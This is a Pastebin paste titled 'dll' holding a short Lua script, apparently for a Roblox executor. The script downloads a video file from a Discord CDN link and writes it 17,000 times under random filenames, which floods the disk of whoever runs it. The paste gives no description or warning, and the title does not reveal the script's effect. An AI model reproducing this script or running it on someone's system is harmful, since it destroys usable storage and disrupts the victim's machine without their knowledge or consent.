SalamieLP1

dll

Oct 24th, 2020
45
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. local link = 'https://cdn.discordapp.com/attachments/710210051113222204/715822728732475412/Editor7.mp4'
  2.  
  3. local content = syn.request(
  4. {
  5. Url = link,
  6. Method = "GET"
  7. }
  8. )
  9.  
  10.  
  11. local chars = "ABCEDFGHIJKLMNOPQRSTUVWYZabcdefghijklmnopqrstuvwxyz1234567890"
  12. --The characters that can be used in the code. You can add symbols too if you want.
  13.  
  14. local function getCode(length)
  15. local code = ""
  16. for i = 1, length do
  17. local randNum = math.random(1, chars:len())
  18. code = code .. chars:sub(randNum, randNum)
  19. end
  20. return code
  21. end
  22.  
  23.  
  24. for count = 1, 17000 do
  25. writefile(getCode(math.random(69))..'.'..getCode(math.random(9)), content.Body)
  26. end
  27.  
  28.  
  29.  
  30.  
Add Comment
Please, Sign In to add comment